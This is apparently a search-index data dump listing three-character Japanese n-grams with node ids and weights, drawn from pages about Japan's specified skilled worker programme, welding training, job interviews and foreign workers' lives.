('格によ', 194, 'ja', 'node_search', 1),
('格のあ', 27, 'ja', 'node_search', 0.312115),
('格のお', 161, 'ja', 'node_search', 31),
('格のお', 166, 'ja', 'node_search', 31),
('格のお', 168, 'ja', 'node_search', 31),
('格のお', 170, 'ja', 'node_search', 31),
('格のお', 178, 'ja', 'node_search', 31),
('格のお', 179, 'ja', 'node_search', 31),
('格のお', 180, 'ja', 'node_search', 31),
('格のお', 181, 'ja', 'node_search', 27),
('格のお', 182, 'ja', 'node_search', 4),
('格のお', 183, 'ja', 'node_search', 4),
('格のお', 185, 'ja', 'node_search', 31),
('格のお', 186, 'ja', 'node_search', 31),
('格のお', 187, 'ja', 'node_search', 31),
('格のお', 188, 'ja', 'node_search', 31),
('格のお', 189, 'ja', 'node_search', 31),
('格のお', 190, 'ja', 'node_search', 31),
('格のお', 191, 'ja', 'node_search', 31),
('格のお', 192, 'ja', 'node_search', 31),
('格のお', 193, 'ja', 'node_search', 31),
('格のお', 194, 'ja', 'node_search', 31),
('格のお', 195, 'ja', 'node_search', 31),
('格のお', 196, 'ja', 'node_search', 31),
('格のお', 197, 'ja', 'node_search', 31),
('格のお', 198, 'ja', 'node_search', 31),
('格のお', 199, 'ja', 'node_search', 31),
('格のお', 200, 'ja', 'node_search', 31),
('格のご', 160, 'ja', 'node_search', 27),
('格の住', 27, 'ja', 'node_search', 0.99038),
('格の裏', 191, 'ja', 'node_search', 1),
('格は新', 180, 'ja', 'node_search', 1),
('格は新', 186, 'ja', 'node_search', 1),
('格を目', 155, 'ja', 'node_search', 0.747619),
('格を祝', 120, 'ja', 'node_search', 19),
('格保持', 162, 'ja', 'node_search', 1.68961),
('格結果', 179, 'ja', 'node_search', 1),
('格者が', 138, 'ja', 'node_search', 0.714225),
('格者は', 138, 'ja', 'node_search', 1),
('格者達', 24, 'ja', 'node_search', 0.703756),
('栽培お', 163, 'ja', 'node_search', 0.942091),
('梁の建', 27, 'ja', 'node_search', 0.558589),
('械の輸', 27, 'ja', 'node_search', 0.886095),
('械を日', 23, 'ja', 'node_search', 0.873132),
('械工学', 30, 'ja', 'node_search', 0.96498),
('椅子移', 162, 'ja', 'node_search', 0.759465),
('検索し', 28, 'ja', 'node_search', 1),
('業あり', 163, 'ja', 'node_search', 0.848323),
('業が必', 5, 'ja', 'node_search', 1),
('業した', 62, 'ja', 'node_search', 1),
('業して', 18, 'ja', 'node_search', 0.96498),
('業です', 24, 'ja', 'node_search', 0.403258),
('業です', 188, 'ja', 'node_search', 0.920273),
('業とし', 27, 'ja', 'node_search', 0.337103),
('業に従', 7, 'ja', 'node_search', 1.8861),
('業の一', 24, 'ja', 'node_search', 0.754681),
('業の一', 27, 'ja', 'node_search', 0.491762),
('業の様', 98, 'ja', 'node_search', 1),
('業は毎', 142, 'ja', 'node_search', 1),
('業や韓', 3, 'ja', 'node_search', 0.833529),
('業をつ', 160, 'ja', 'node_search', 0.797402),
('業を受', 24, 'ja', 'node_search', 0.355508),
('業を可', 27, 'ja', 'node_search', 0.524706),
('業を含', 163, 'ja', 'node_search', 0.842342),
('業を営', 27, 'ja', 'node_search', 0.873132),
('業を結', 179, 'ja', 'node_search', 0.909743),
('業を開', 27, 'ja', 'node_search', 1),
('業内容', 24, 'ja', 'node_search', 27),
('業分野', 185, 'ja', 'node_search', 0.96498),
('業分野', 187, 'ja', 'node_search', 0.945829),
('業務ま', 133, 'ja', 'node_search', 1),
('業務を', 27, 'ja', 'node_search', 0.315277),
('業務内', 162, 'ja', 'node_search', 3.18961),
('業務内', 163, 'ja', 'node_search', 3.84435),
('業員が', 27, 'ja', 'node_search', 0.310558),
('業員に', 77, 'ja', 'node_search', 1),
('業員を', 23, 'ja', 'node_search', 0.786915),
('業員向', 27, 'ja', 'node_search', 0.648686),
('業建築', 27, 'ja', 'node_search', 0.86722),
('業手当', 5, 'ja', 'node_search', 1),
('業時間', 155, 'ja', 'node_search', 0.899454),
('業生な', 24, 'ja', 'node_search', 0.376684),
('業用住', 27, 'ja', 'node_search', 0.408633),
('業界で', 18, 'ja', 'node_search', 1),
('業界で', 161, 'ja', 'node_search', 1),
('業界で', 164, 'ja', 'node_search', 1),
('業界で', 166, 'ja', 'node_search', 1),
('業界で', 167, 'ja', 'node_search', 1),
('業界で', 168, 'ja', 'node_search', 1),
('業界で', 173, 'ja', 'node_search', 0.989021),
('業界で', 174, 'ja', 'node_search', 1),
('業界で', 175, 'ja', 'node_search', 1),
('業界で', 176, 'ja', 'node_search', 1),
('業界で', 177, 'ja', 'node_search', 1),
('業界で', 185, 'ja', 'node_search', 0.886095),
('業界で', 187, 'ja', 'node_search', 1),
('業界で', 190, 'ja', 'node_search', 1),
('業界で', 192, 'ja', 'node_search', 0.997306),
('業界で', 193, 'ja', 'node_search', 1),
('業界で', 194, 'ja', 'node_search', 1),
('業界で', 195, 'ja', 'node_search', 1),
('業界で', 198, 'ja', 'node_search', 1),
('業界に', 155, 'ja', 'node_search', 0.729424),
('業経験', 163, 'ja', 'node_search', 2.71211),
('業経験', 194, 'ja', 'node_search', 1),
('業関係', 24, 'ja', 'node_search', 2.38964),
('極的に', 135, 'ja', 'node_search', 0.749958),
('楽しみ', 1, 'ja', 'node_search', 1),
('様に十', 27, 'ja', 'node_search', 0.308635),
('様のご', 162, 'ja', 'node_search', 0.96498),
('様の新', 154, 'ja', 'node_search', 1),
('様の新', 165, 'ja', 'node_search', 0.934703),
('様の目', 1, 'ja', 'node_search', 1),
('様は日', 173, 'ja', 'node_search', 1),
('様は研', 169, 'ja', 'node_search', 1),
('様子で', 98, 'ja', 'node_search', 1),
('標とし', 155, 'ja', 'node_search', 0.695602),
('標に向', 160, 'ja', 'node_search', 1),
('標に向', 166, 'ja', 'node_search', 1),
('標に向', 168, 'ja', 'node_search', 1),
('標に向', 170, 'ja', 'node_search', 1),
('標に向', 173, 'ja', 'node_search', 0.889397),
('標に向', 180, 'ja', 'node_search', 1),
('標に向', 183, 'ja', 'node_search', 0.851346),
('標に向', 186, 'ja', 'node_search', 1),
('標に向', 188, 'ja', 'node_search', 1),
('標に向', 190, 'ja', 'node_search', 0.980874),
('標に向', 191, 'ja', 'node_search', 0.989021),
('標に向', 192, 'ja', 'node_search', 1),
('標に向', 196, 'ja', 'node_search', 1),
('標に向', 199, 'ja', 'node_search', 1),
('標達成', 1, 'ja', 'node_search', 1),
('模のゼ', 23, 'ja', 'node_search', 1),
('模範的', 80, 'ja', 'node_search', 1),
('橋とし', 160, 'ja', 'node_search', 0.779231),
('橋とし', 179, 'ja', 'node_search', 0.879565),
('橋梁の', 27, 'ja', 'node_search', 0.559882),
('機会が', 135, 'ja', 'node_search', 0.759465),
('機会が', 187, 'ja', 'node_search', 0.902857),
('機会が', 198, 'ja', 'node_search', 0.938382),
('機会で', 116, 'ja', 'node_search', 1),
('機会で', 164, 'ja', 'node_search', 0.972861),
('機会で', 171, 'ja', 'node_search', 0.980874),
('機会で', 174, 'ja', 'node_search', 0.949597),
('機会で', 177, 'ja', 'node_search', 0.976851),
('機会と', 111, 'ja', 'node_search', 1),
('機会と', 192, 'ja', 'node_search', 0.876337),
('機会に', 1, 'ja', 'node_search', 1),
('機会を', 23, 'ja', 'node_search', 0.552215),
('機会を', 28, 'ja', 'node_search', 1),
('機会を', 62, 'ja', 'node_search', 0.520204),
('機会を', 116, 'ja', 'node_search', 1),
('機会を', 150, 'ja', 'node_search', 1),
('機会を', 185, 'ja', 'node_search', 0.923838),
('機会を', 194, 'ja', 'node_search', 0.824901),
('機材に', 27, 'ja', 'node_search', 0.563797),
('機械の', 27, 'ja', 'node_search', 0.889397),
('機械を', 23, 'ja', 'node_search', 0.876337),
('機械工', 30, 'ja', 'node_search', 0.968904),
('機関お', 27, 'ja', 'node_search', 0.679856),
('機関と', 23, 'ja', 'node_search', 0.916736),
('機関を', 156, 'ja', 'node_search', 0.953396),
('機関を', 157, 'ja', 'node_search', 0.842342),
('次のス', 185, 'ja', 'node_search', 1),
('欲が必', 3, 'ja', 'node_search', 0.886095),
('欲と努', 195, 'ja', 'node_search', 1),
('正しさ', 87, 'ja', 'node_search', 0.610858),
('正直さ', 25, 'ja', 'node_search', 1),
('正確な', 87, 'ja', 'node_search', 0.685676),
('歩であ', 180, 'ja', 'node_search', 0.938382),
('歩であ', 186, 'ja', 'node_search', 0.976851),
('歩であ', 192, 'ja', 'node_search', 0.938382),
('歩であ', 196, 'ja', 'node_search', 0.949597),
('歩とな', 160, 'ja', 'node_search', 0.993146),
('歩とな', 161, 'ja', 'node_search', 1),
('歩とな', 168, 'ja', 'node_search', 0.808176),
('歩とな', 170, 'ja', 'node_search', 0.792123),
('歩とな', 174, 'ja', 'node_search', 0.906287),
('歩とな', 178, 'ja', 'node_search', 1),
('歩とな', 181, 'ja', 'node_search', 0.906287),
('歩とな', 185, 'ja', 'node_search', 1),
('歩とな', 187, 'ja', 'node_search', 1),
('歩とな', 191, 'ja', 'node_search', 0.909743),
('歩とな', 193, 'ja', 'node_search', 1),
('歩とな', 197, 'ja', 'node_search', 1),
('歩と成', 140, 'ja', 'node_search', 0.797402),
('歩を踏', 175, 'ja', 'node_search', 1),
('歩を踏', 177, 'ja', 'node_search', 0.876337),
('歩を踏', 184, 'ja', 'node_search', 0.892724),
('歩を踏', 190, 'ja', 'node_search', 0.945829),
('歩行や', 162, 'ja', 'node_search', 0.769219),
('歳から', 5, 'ja', 'node_search', 0.822065),
('歳の健', 5, 'ja', 'node_search', 0.816452),
('歳以下', 18, 'ja', 'node_search', 1),
('歴の要', 5, 'ja', 'node_search', 0.779231),
('残る可', 8, 'ja', 'node_search', 2),
('残業あ', 163, 'ja', 'node_search', 0.851346),
('残業が', 5, 'ja', 'node_search', 1),
('残業と', 8, 'ja', 'node_search', 2),
('残業を', 163, 'ja', 'node_search', 0.845322),
('残業代', 162, 'ja', 'node_search', 0.716357),
('残業手', 5, 'ja', 'node_search', 1),
('段とし', 5, 'ja', 'node_search', 0.860547),
('母国に', 3, 'ja', 'node_search', 0.570448),
('毎日の', 142, 'ja', 'node_search', 0.693594),
('毎日を', 175, 'ja', 'node_search', 0.882818),
('毎日を', 177, 'ja', 'node_search', 0.802752),
('毎日行', 142, 'ja', 'node_search', 1),
('比類な', 62, 'ja', 'node_search', 0.882818),
('民族を', 23, 'ja', 'node_search', 0.623497),
('民族問', 24, 'ja', 'node_search', 1),
('民間お', 27, 'ja', 'node_search', 0.388583),
('民間の', 27, 'ja', 'node_search', 0.670377),
('民間住', 27, 'ja', 'node_search', 0.35705),
('民間部', 27, 'ja', 'node_search', 0.476356),
('気で取', 135, 'ja', 'node_search', 1),
('気を付', 77, 'ja', 'node_search', 4),
('気エン', 10, 'ja', 'node_search', 29),
('気持ち', 189, 'ja', 'node_search', 0.997306),
('気軽に', 1, 'ja', 'node_search', 1),
('気軽に', 155, 'ja', 'node_search', 0.652202),
('水曜日', 62, 'ja', 'node_search', 1.18891),
('永続的', 25, 'ja', 'node_search', 1),
('求めて', 18, 'ja', 'node_search', 3),
('求めて', 30, 'ja', 'node_search', 3),
('求めら', 189, 'ja', 'node_search', 0.980874),
('求人で', 162, 'ja', 'node_search', 1),
('求人で', 163, 'ja', 'node_search', 1.96498),
('求人は', 162, 'ja', 'node_search', 1),
('求人募', 163, 'ja', 'node_search', 4),
('沿って', 27, 'ja', 'node_search', 0.577261),
('泊分野', 155, 'ja', 'node_search', 1.85135),
('泊分野', 168, 'ja', 'node_search', 4),
('泊業界', 164, 'ja', 'node_search', 1),
('泊業界', 166, 'ja', 'node_search', 1),
('泊業界', 168, 'ja', 'node_search', 1),
('法から', 133, 'ja', 'node_search', 1),
('法を教', 28, 'ja', 'node_search', 1),
('法を磨', 62, 'ja', 'node_search', 0.833529),
('注力し', 135, 'ja', 'node_search', 1),
('注意な', 87, 'ja', 'node_search', 0.727213),
('活かし', 163, 'ja', 'node_search', 1),
('活かし', 176, 'ja', 'node_search', 0.989021),
('活かし', 195, 'ja', 'node_search', 1),
('活と仕', 154, 'ja', 'node_search', 0.98493),
('活と仕', 164, 'ja', 'node_search', 0.906287),
('活と仕', 165, 'ja', 'node_search', 0.863659),
('活と仕', 171, 'ja', 'node_search', 0.906287),
('活と仕', 174, 'ja', 'node_search', 0.882818),
('活と仕', 175, 'ja', 'node_search', 0.972861),
('活と仕', 177, 'ja', 'node_search', 0.902857),
('活と明', 167, 'ja', 'node_search', 0.961087),
('活のサ', 162, 'ja', 'node_search', 0.927431),
('活の両', 177, 'ja', 'node_search', 0.752312),
('活をお', 169, 'ja', 'node_search', 0.816452),
('活をお', 176, 'ja', 'node_search', 0.824901),
('活を支', 188, 'ja', 'node_search', 0.989021),
('活を送', 184, 'ja', 'node_search', 0.802752),
('活動か', 179, 'ja', 'node_search', 0.866793),
('活動に', 27, 'ja', 'node_search', 0.691597),
('活動に', 150, 'ja', 'node_search', 1),
('活動や', 135, 'ja', 'node_search', 1),
('活動や', 138, 'ja', 'node_search', 1),
('活用し', 116, 'ja', 'node_search', 1),
('活費は', 5, 'ja', 'node_search', 0.923838),
('活躍が', 126, 'ja', 'node_search', 1),
('活躍が', 180, 'ja', 'node_search', 0.923838),
('活躍が', 185, 'ja', 'node_search', 0.866793),
('活躍が', 186, 'ja', 'node_search', 0.957226),
('活躍が', 199, 'ja', 'node_search', 0.882818),
('活躍さ', 154, 'ja', 'node_search', 0.886095),
('活躍さ', 177, 'ja', 'node_search', 0.738408),
('活躍さ', 183, 'ja', 'node_search', 0.808176),
('活躍さ', 188, 'ja', 'node_search', 0.892724),
('活躍さ', 190, 'ja', 'node_search', 0.836446),
('活躍さ', 195, 'ja', 'node_search', 0.98493),
('活躍し', 189, 'ja', 'node_search', 1),
('活躍す', 136, 'ja', 'node_search', 0.882818),
('活躍す', 188, 'ja', 'node_search', 1),
('活躍す', 192, 'ja', 'node_search', 0.98493),
('活躍と', 169, 'ja', 'node_search', 0.845322),
('活躍と', 171, 'ja', 'node_search', 0.824901),
('活躍と', 176, 'ja', 'node_search', 0.857458),
('活躍と', 180, 'ja', 'node_search', 0.836446),
('活躍と', 192, 'ja', 'node_search', 0.810915),
('活躍と', 196, 'ja', 'node_search', 0.833529),
('活躍を', 160, 'ja', 'node_search', 0.857458),
('活躍を', 161, 'ja', 'node_search', 0.906287),
('活躍を', 166, 'ja', 'node_search', 0.886095),
('活躍を', 168, 'ja', 'node_search', 0.889397),
('活躍を', 170, 'ja', 'node_search', 0.899454),
('活躍を', 178, 'ja', 'node_search', 0.808176),
('活躍を', 179, 'ja', 'node_search', 0.749958),
('活躍を', 181, 'ja', 'node_search', 0.819249),
('活躍を', 182, 'ja', 'node_search', 0.869951),
('活躍を', 188, 'ja', 'node_search', 0.776703),
('活躍を', 191, 'ja', 'node_search', 0.824901),
('活躍を', 193, 'ja', 'node_search', 0.810915),
('活躍を', 195, 'ja', 'node_search', 0.833529),
('活躍を', 198, 'ja', 'node_search', 0.797402),
('流暢に', 30, 'ja', 'node_search', 1.84234),
('海外で', 26, 'ja', 'node_search', 1),
('海外に', 24, 'ja', 'node_search', 1),
('海外の', 23, 'ja', 'node_search', 0.426419),
('海外エ', 23, 'ja', 'node_search', 2.0823),
('海外エ', 24, 'ja', 'node_search', 1.46543),
('海外労', 3, 'ja', 'node_search', 0.548462),
('海外就', 154, 'ja', 'node_search', 0.816452),
('海外就', 164, 'ja', 'node_search', 0.779231),
('海外就', 165, 'ja', 'node_search', 0.776703),
('海外就', 167, 'ja', 'node_search', 0.848323),
('海道へ', 68, 'ja', 'node_search', 1),
('海道へ', 78, 'ja', 'node_search', 1),
('消防署', 27, 'ja', 'node_search', 0.36497),
('深めま', 122, 'ja', 'node_search', 0.902857),
('減して', 138, 'ja', 'node_search', 0.674137),
('減する', 138, 'ja', 'node_search', 0.836446),
('減らし', 87, 'ja', 'node_search', 0.742984),
('減ソリ', 27, 'ja', 'node_search', 0.430168),
('渡った', 3, 'ja', 'node_search', 0.757065),
('渡日後', 179, 'ja', 'node_search', 0.854391),
('湾岸で', 23, 'ja', 'node_search', 0.581429),
('湾岸で', 24, 'ja', 'node_search', 1),
('満足い', 27, 'ja', 'node_search', 0.306359),
('源でし', 120, 'ja', 'node_search', 1),
('源開発', 27, 'ja', 'node_search', 0.78951),
('準で管', 24, 'ja', 'node_search', 0.469016),
('準で管', 26, 'ja', 'node_search', 1),
('準に沿', 27, 'ja', 'node_search', 0.580033),
('準備お', 162, 'ja', 'node_search', 0.784336),
('準備が', 120, 'ja', 'node_search', 1),
('準備が', 133, 'ja', 'node_search', 0.742984),
('準備が', 175, 'ja', 'node_search', 1),
('準備が', 177, 'ja', 'node_search', 0.938382),
('準備が', 178, 'ja', 'node_search', 1),
('準備が', 184, 'ja', 'node_search', 0.949597),
('準備が', 185, 'ja', 'node_search', 1),
('準備が', 187, 'ja', 'node_search', 1),
('準備が', 194, 'ja', 'node_search', 0.953396),
('準備が', 197, 'ja', 'node_search', 0.945829),
('準備と', 165, 'ja', 'node_search', 1),
('準備と', 179, 'ja', 'node_search', 1),
('準備の', 160, 'ja', 'node_search', 1),
('準備の', 161, 'ja', 'node_search', 1),
('準備の', 168, 'ja', 'node_search', 1),
('準備の', 170, 'ja', 'node_search', 1),
('準備の', 176, 'ja', 'node_search', 1),
('準備の', 186, 'ja', 'node_search', 1),
('準備の', 190, 'ja', 'node_search', 1),
('準備の', 193, 'ja', 'node_search', 1),
('準備の', 195, 'ja', 'node_search', 1),
('準備の', 199, 'ja', 'node_search', 0.980874),
('準備を', 138, 'ja', 'node_search', 1),
('準備を', 140, 'ja', 'node_search', 1),
('準備を', 142, 'ja', 'node_search', 1),
('準備を', 169, 'ja', 'node_search', 1),
('準備を', 173, 'ja', 'node_search', 1),
('準備を', 174, 'ja', 'node_search', 1),
('準備作', 163, 'ja', 'node_search', 0.873132),
('準専門', 7, 'ja', 'node_search', 1.8861),
('溶接の', 3, 'ja', 'node_search', 0.659351),
('溶接ク', 3, 'ja', 'node_search', 43),
('溶接技', 3, 'ja', 'node_search', 1.63275),
('溶接技', 8, 'ja', 'node_search', 29),
('溶接技', 19, 'ja', 'node_search', 28),
('溶接研', 9, 'ja', 'node_search', 3),
('溶接研', 17, 'ja', 'node_search', 4),
('溶接試', 6, 'ja', 'node_search', 3),
('滞なく', 133, 'ja', 'node_search', 0.722831),
('漁業関', 24, 'ja', 'node_search', 0.588512),
('漢字を', 62, 'ja', 'node_search', 0.808176),
('漢字日', 62, 'ja', 'node_search', 0.592848),
('潜在的', 136, 'ja', 'node_search', 0.71),
('潜在的', 138, 'ja', 'node_search', 0.687638),
('潟大学', 62, 'ja', 'node_search', 1),
('火曜日', 62, 'ja', 'node_search', 1.19054),
('点に自', 27, 'ja', 'node_search', 0.923838),
('無事終', 133, 'ja', 'node_search', 0.927431),
('熟練労', 30, 'ja', 'node_search', 28),
('熱心な', 133, 'ja', 'node_search', 0.857458),
('熱心な', 160, 'ja', 'node_search', 1),
('熱心な', 161, 'ja', 'node_search', 1),
('熱心な', 168, 'ja', 'node_search', 1),
('熱心な', 170, 'ja', 'node_search', 1),
('熱心に', 150, 'ja', 'node_search', 1),
('熱意と', 199, 'ja', 'node_search', 0.993146),
('熱意の', 166, 'ja', 'node_search', 1),
('熱意の', 179, 'ja', 'node_search', 1),
('熱意の', 188, 'ja', 'node_search', 1),
('熱意の', 198, 'ja', 'node_search', 1),
('熱費は', 163, 'ja', 'node_search', 0.752312),
('物の修', 27, 'ja', 'node_search', 0.664818),
('物の生', 163, 'ja', 'node_search', 0.909743),
('物支援', 162, 'ja', 'node_search', 0.745294),
('特別な', 7, 'ja', 'node_search', 3.8861),
('特定の', 7, 'ja', 'node_search', 1.8861),
('特定ビ', 24, 'ja', 'node_search', 0.391056),
('特定介', 141, 'ja', 'node_search', 1),
('特定外', 70, 'ja', 'node_search', 1),
('特定外', 71, 'ja', 'node_search', 1),
('特定外', 72, 'ja', 'node_search', 1),
('特定外', 74, 'ja', 'node_search', 1),
('特定外', 75, 'ja', 'node_search', 1),
('特定外', 82, 'ja', 'node_search', 1),
('特定外', 84, 'ja', 'node_search', 1),
('特定外', 85, 'ja', 'node_search', 4),
('特定外', 90, 'ja', 'node_search', 1),
('特定外', 98, 'ja', 'node_search', 1),
('特定外', 100, 'ja', 'node_search', 4),
('特定外', 104, 'ja', 'node_search', 7),
('特定外', 106, 'ja', 'node_search', 1),
('特定外', 110, 'ja', 'node_search', 1),
('特定外', 111, 'ja', 'node_search', 1),
('特定外', 118, 'ja', 'node_search', 1),
('特定外', 124, 'ja', 'node_search', 1),
('特定外', 138, 'ja', 'node_search', 1),
('特定外', 144, 'ja', 'node_search', 1),
('特定技', 24, 'ja', 'node_search', 0.833529),
('特定技', 62, 'ja', 'node_search', 0.72066),
('特定技', 154, 'ja', 'node_search', 28.7869),
('特定技', 155, 'ja', 'node_search', 35.5994),
('特定技', 156, 'ja', 'node_search', 28.9384),
('特定技', 157, 'ja', 'node_search', 28.8335),
('特定技', 160, 'ja', 'node_search', 30.9905),
('特定技', 161, 'ja', 'node_search', 28.75),
('特定技', 162, 'ja', 'node_search', 32.6896),
('特定技', 163, 'ja', 'node_search', 33),
('特定技', 164, 'ja', 'node_search', 28.7523),
('特定技', 165, 'ja', 'node_search', 30.9998),
('特定技', 166, 'ja', 'node_search', 31.0868),
('特定技', 167, 'ja', 'node_search', 28.8165),
('特定技', 168, 'ja', 'node_search', 28.7595),
('特定技', 169, 'ja', 'node_search', 31.1477),
('特定技', 170, 'ja', 'node_search', 30.9812),
('特定技', 171, 'ja', 'node_search', 31.0968),
('特定技', 173, 'ja', 'node_search', 31.0475),
('特定技', 174, 'ja', 'node_search', 28.7185),
('特定技', 175, 'ja', 'node_search', 28.7643),
('特定技', 176, 'ja', 'node_search', 28.7407),
('特定技', 177, 'ja', 'node_search', 28.71),
('特定技', 178, 'ja', 'node_search', 28.7818),
('特定技', 179, 'ja', 'node_search', 29.7316),
('特定技', 180, 'ja', 'node_search', 28.8001),
('特定技', 184, 'ja', 'node_search', 28.7571),
('特定技', 185, 'ja', 'node_search', 31.0092),
('特定技', 186, 'ja', 'node_search', 28.7692),
('特定技', 187, 'ja', 'node_search', 30.9628),
('特定技', 188, 'ja', 'node_search', 28.7619),
('特定技', 189, 'ja', 'node_search', 30.9998),
('特定技', 190, 'ja', 'node_search', 31.0769),
('特定技', 191, 'ja', 'node_search', 31.2327),
('特定技', 192, 'ja', 'node_search', 31.1169),
('特定技', 193, 'ja', 'node_search', 31.179),
('特定技', 194, 'ja', 'node_search', 31.0092),
('特定技', 195, 'ja', 'node_search', 28.8055),
('特定技', 196, 'ja', 'node_search', 31.1896),
('特定技', 197, 'ja', 'node_search', 31.0769),
('特定技', 198, 'ja', 'node_search', 28.7818),
('特定技', 199, 'ja', 'node_search', 31.0187),
('特定技', 200, 'ja', 'node_search', 31.1068),
('特定能', 7, 'ja', 'node_search', 28.8861),
('特定飲', 101, 'ja', 'node_search', 4),
('特定飲', 102, 'ja', 'node_search', 1),
('特恵外', 73, 'ja', 'node_search', 1),
('特選外', 81, 'ja', 'node_search', 4),
('特選外', 134, 'ja', 'node_search', 1),
('状を見', 26, 'ja', 'node_search', 1),
('独占的', 62, 'ja', 'node_search', 29),
('独自に', 142, 'ja', 'node_search', 0.830633),
('献身を', 135, 'ja', 'node_search', 0.830633),
('献身的', 80, 'ja', 'node_search', 1),
('献身的', 140, 'ja', 'node_search', 0.980874),
('現した', 199, 'ja', 'node_search', 0.934703),
('現に向', 193, 'ja', 'node_search', 1),
('現に向', 198, 'ja', 'node_search', 1),
('現を教', 24, 'ja', 'node_search', 0.430926),
('現在の', 3, 'ja', 'node_search', 0.62674),
('現在の', 142, 'ja', 'node_search', 0.786915),
('現在日', 24, 'ja', 'node_search', 0.913226),
('現在日', 155, 'ja', 'node_search', 0.833529),
('現場で', 5, 'ja', 'node_search', 3),
('現場で', 188, 'ja', 'node_search', 0.899454),
('現場用', 23, 'ja', 'node_search', 0.949597),
('現状を', 26, 'ja', 'node_search', 1),
('理して', 24, 'ja', 'node_search', 0.466323),
('理して', 26, 'ja', 'node_search', 1),
('理で行', 5, 'ja', 'node_search', 0.980874),
('理の背', 122, 'ja', 'node_search', 0.976851),
('理店と', 142, 'ja', 'node_search', 0.882818),
('理念建', 27, 'ja', 'node_search', 0.543537),
('理経験', 30, 'ja', 'node_search', 1.84234),
('理職や', 7, 'ja', 'node_search', 1.8861),
('理補助', 163, 'ja', 'node_search', 0.892724),
('理解し', 77, 'ja', 'node_search', 4),
('理解す', 3, 'ja', 'node_search', 1.04431),
('理解す', 87, 'ja', 'node_search', 1),
('理解す', 122, 'ja', 'node_search', 2),
('理解で', 3, 'ja', 'node_search', 0.521322),
('理解で', 5, 'ja', 'node_search', 0.757065),
('理論ク', 140, 'ja', 'node_search', 19),
('理責任', 27, 'ja', 'node_search', 0.60322),
('理関係', 24, 'ja', 'node_search', 0.61241),
('環境で', 138, 'ja', 'node_search', 0.866793),
('環境の', 169, 'ja', 'node_search', 0.968904),
('環境を', 120, 'ja', 'node_search', 0.902857),
('生がそ', 136, 'ja', 'node_search', 0.957226),
('生たち', 9, 'ja', 'node_search', 3),
('生たち', 17, 'ja', 'node_search', 4),
('生たち', 95, 'ja', 'node_search', 1),
('生だけ', 136, 'ja', 'node_search', 1),
('生と手', 62, 'ja', 'node_search', 1),
('生など', 24, 'ja', 'node_search', 0.376109),
('生にも', 136, 'ja', 'node_search', 1),
('生に伝', 133, 'ja', 'node_search', 0.886095),
('生に対', 6, 'ja', 'node_search', 3),
('生に対', 23, 'ja', 'node_search', 0.454162),
('生のト', 133, 'ja', 'node_search', 0.76431),
('生の成', 136, 'ja', 'node_search', 0.687638),
('生は以', 157, 'ja', 'node_search', 1),
('生は日', 136, 'ja', 'node_search', 0.733888),
('生は高', 136, 'ja', 'node_search', 0.802752),
('生み出', 25, 'ja', 'node_search', 1),
('生み出', 26, 'ja', 'node_search', 1),
('生を育', 23, 'ja', 'node_search', 0.42866),
('生イン', 122, 'ja', 'node_search', 19),
('生ビザ', 24, 'ja', 'node_search', 0.653974),
('生ビザ', 62, 'ja', 'node_search', 0.71),
('生向け', 98, 'ja', 'node_search', 19),
('生徒が', 135, 'ja', 'node_search', 1),
('生徒が', 142, 'ja', 'node_search', 0.839384),
('生徒に', 135, 'ja', 'node_search', 0.727213),
('生徒の', 135, 'ja', 'node_search', 0.851346),
('生徒の', 140, 'ja', 'node_search', 1),
('生徒の', 142, 'ja', 'node_search', 1),
('生徒は', 142, 'ja', 'node_search', 0.697623),
('生徒を', 140, 'ja', 'node_search', 20),
('生徒達', 25, 'ja', 'node_search', 1),
('生徒達', 26, 'ja', 'node_search', 2),
('生懸命', 77, 'ja', 'node_search', 4),
('生懸命', 87, 'ja', 'node_search', 2.2473),
('生懸命', 98, 'ja', 'node_search', 1),
('生活と', 154, 'ja', 'node_search', 0.989021),
('生活と', 164, 'ja', 'node_search', 0.909743),
('生活と', 165, 'ja', 'node_search', 0.866793),
('生活と', 167, 'ja', 'node_search', 0.96498),
('生活と', 171, 'ja', 'node_search', 0.909743),
('生活と', 174, 'ja', 'node_search', 0.886095),
('生活と', 175, 'ja', 'node_search', 0.976851),
('生活と', 177, 'ja', 'node_search', 0.906287),
('生活の', 162, 'ja', 'node_search', 0.931053),
('生活の', 177, 'ja', 'node_search', 0.754681),
('生活を', 169, 'ja', 'node_search', 0.819249),
('生活を', 176, 'ja', 'node_search', 0.827757),
('生活を', 184, 'ja', 'node_search', 0.805455),
('生活を', 188, 'ja', 'node_search', 0.993146),
('生活費', 5, 'ja', 'node_search', 0.927431),
('生活費', 8, 'ja', 'node_search', 2),
('生活費', 18, 'ja', 'node_search', 1),
('生産管', 163, 'ja', 'node_search', 0.902857),
('生達と', 20, 'ja', 'node_search', 31),
('生達に', 24, 'ja', 'node_search', 1.43712),
('生達の', 24, 'ja', 'node_search', 1.56249),
('産業建', 27, 'ja', 'node_search', 0.486839),
('産管理', 163, 'ja', 'node_search', 0.899454),
('用され', 6, 'ja', 'node_search', 3),
('用され', 156, 'ja', 'node_search', 1.94583),
('用され', 157, 'ja', 'node_search', 1.83645),
('用する', 23, 'ja', 'node_search', 0.776703),
('用のト', 23, 'ja', 'node_search', 0.942091),
('用を完', 87, 'ja', 'node_search', 0.754681),
('用トラ', 27, 'ja', 'node_search', 0.326456),
('用住宅', 27, 'ja', 'node_search', 0.407953),
('用各種', 27, 'ja', 'node_search', 0.324324),
('用的な', 135, 'ja', 'node_search', 1),
('用者様', 162, 'ja', 'node_search', 0.972861),
('用自動', 27, 'ja', 'node_search', 0.330807),
('用面接', 160, 'ja', 'node_search', 3.99047),
('用面接', 161, 'ja', 'node_search', 1.74996),
('用面接', 166, 'ja', 'node_search', 4.08679),
('用面接', 168, 'ja', 'node_search', 1.75946),
('用面接', 170, 'ja', 'node_search', 3.98118),
('用面接', 178, 'ja', 'node_search', 1.78178),
('用面接', 179, 'ja', 'node_search', 1.73165),
('用面接', 180, 'ja', 'node_search', 1.80007),
('用面接', 185, 'ja', 'node_search', 4.00925),
('用面接', 186, 'ja', 'node_search', 1.76922),
('用面接', 187, 'ja', 'node_search', 3.96276),
('用面接', 188, 'ja', 'node_search', 1.76188),
('用面接', 189, 'ja', 'node_search', 3.99983),
('用面接', 190, 'ja', 'node_search', 4.07688),
('用面接', 191, 'ja', 'node_search', 4.2327),
('用面接', 192, 'ja', 'node_search', 4.11692),
('用面接', 193, 'ja', 'node_search', 4.17901),
('用面接', 194, 'ja', 'node_search', 4.00925),
('用面接', 195, 'ja', 'node_search', 1.80545),
('用面接', 196, 'ja', 'node_search', 4.18961),
('用面接', 197, 'ja', 'node_search', 4.07688),
